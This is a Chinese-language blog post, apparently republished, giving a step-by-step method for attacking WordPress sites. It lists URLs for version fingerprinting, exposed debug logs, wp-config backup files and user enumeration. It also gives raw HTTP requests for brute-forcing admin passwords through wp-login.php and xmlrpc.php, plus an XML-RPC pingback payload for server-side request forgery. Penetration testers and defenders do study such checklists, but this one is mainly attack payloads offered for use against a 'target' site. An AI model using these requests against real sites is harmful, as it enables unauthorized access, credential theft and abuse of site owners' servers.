干货 | Wordpress网站渗透方法指南

VSole2022-09-15 08:04:05

如果您遇到使用 WordPress 的网站,您会怎么做,渗透思路和安全检测思路?

如何挖掘Wordpress网站的漏洞如果您访问https://target.com并查看源代码,您将看到来自 WordPress 的主题和插件的链接。

或者你可以访问https://target.com/wp-login.php,它是 WordPress 登录管理页面

通过查看核心、插件和主题版本找到相关的CVE

  • 如何找到wordpress版本
https://target.com/feed 
https://target.com/?feed=rss2
  • 如何找到插件版本
https://target.com/wp-content/plugins/PLUGINNAME/readme.txt
https://target.com/wp-content/plugins/PLUGINNAME/readme.TXT
https://target.com/wp-content/plugins/PLUGINNAME/README.txt
https://target.com/wp-content/plugins/PLUGINNAME/README.TXT
  • 如何找到主题版本
https://target.com/wp-content/themes/THEMENAME/style.css 
https://target.com/wp-content/themes/THEMENAME/readme.txt (If they have readme file)

如果您发现过时的核心/插件/主题,请在https://wpscan.com找到漏洞利用

  • 查找日志文件
http://target.com/wp-content/debug.log

查找备份文件 wp-config

http://target.com/.wp-config.php.swp
http://target.com/wp-config.inc
http://target.com/wp-config.old
http://target.com/wp-config.txt
http://target.com/wp-config.html
http://target.com/wp-config.php.bak
http://target.com/wp-config.php.dist
http://target.com/wp-config.php.inc
http://target.com/wp-config.php.old
http://target.com/wp-config.php.save
http://target.com/wp-config.php.swp
http://target.com/wp-config.php.txt
http://target.com/wp-config.php.zip
http://target.com/wp-config.php.html
http://target.com/wp-config.php~
  • 获取网站上的用户名
http://target.com/?author=1

或者

http://target.com/wp-json/wp/v2/users 
http://target.com/?rest_route=/wp/v2/users
  • 爆破后台账号密码
POST /wp-login.php HTTP/1.1
Host: target.com

log=admin&pwd=BRUTEFORCE_IN_HERE&wp-submit=Log+In&redirect_to=http%3A%2F%2Ftarget.com%2Fwp-admin%2F&testcookie=1

或者

POST /xmlrpc.php HTTP/1.1
Host: target.com

<?xml version="1.0" encoding="UTF-8"?>
<methodCall> 
<methodName>wp.getUsersBlogs</methodName> 
<params> 
<param><value>admin</value></param> 
<param><value>BRUTEFORCE_IN_HERE</value></param> 
</params> 
</methodCall>
  • wordpress 中的 XSPA
POST /xmlrpc.php HTTP/1.1
Host: target.com

<methodCall>
<methodName>pingback.ping</methodName>
<params><param>
<value><string>http://yourip:port</string></value>
</param><param>
<value>
<string>https://target.com></string>
</value>
</param></params>
</methodCall>
  • 注册启用
http://example.com/wp-login.php?action=register
httpswordpress
本作品采用《CC 协议》,转载必须注明作者和本文链接
近日,WordPress发布安全公告,公开了WordPress Download Manager存在认证后目录遍历漏洞和认证后文件上传漏洞。建议受影响用户尽快更新至安全版本进行防护,并做好资产自查以及预防工作,以免遭受黑客攻击。
DerpnStink靶场
2023-01-12 11:40:41
DerpnStink信息收集使用nmap进行深度扫描,发现开放了21和22端口,以及80端口,80端口为wordpress应用,存在wordpress登陆apiNmap scan report for 10.0.3.4
另外需要说明一下,原文只是一个系列(https://sploitfun.wordpress.com/2015/06/26/linux-x86-exploit-development-tutorial-series/)中的一篇文章:
关于 DNS TXT 记录的意义可以参考下面两篇文章:TXT 记录值 - Google Workspace 管理员帮助https://support.google.com/a/answer/2716802?hl=zh-HansDNS中TXT记录是做什么用的?既然输出没有问题了,可以进行转换了,这里又涉及一个问题:certutil 只能对文件进行转换,
Doldrums是一款功能强大的逆向工程分析工具,主要针对的是Android端Flutter应用程序
该漏洞是CGI脚本在处理authentication.cgi请求,来读取POST参数中的"password"参数的值时造成的缓冲区溢出。
在生产环境中,我们会经常编写一些 Shell 命令或脚本帮我们的工作,本文分享了最近用到的几例 shell 实用脚本,感兴趣的朋友跟随杰哥一起看看吧。很多人认为 Shell 脚本简单,但其实 Shell 小脚本却有大智慧。/bin/bash语法缩进,使用四个空格;多加注释说明。默认变量是全局的,在函数中变量local指定为局部变量,避免污染其他作用域。
如果您遇到使用 WordPress 的网站,您会怎么做,渗透思路和安全检测思路?如何挖掘Wordpress网站的漏洞如果您访问https://target.com并查看源代码,您将看到来自 WordPress 的主题和插件的链接。获取网站上的用户名http://target.com/?
苹果发布了一个紧急安全补丁,以解决两项被积极利用以入侵iPhone、iPad和Mac的零日漏洞,并建议用户尽快安装安全更新。
赛米控遭勒索攻击/俄黑客侵入乌国防大学服务器
VSole
网络安全专家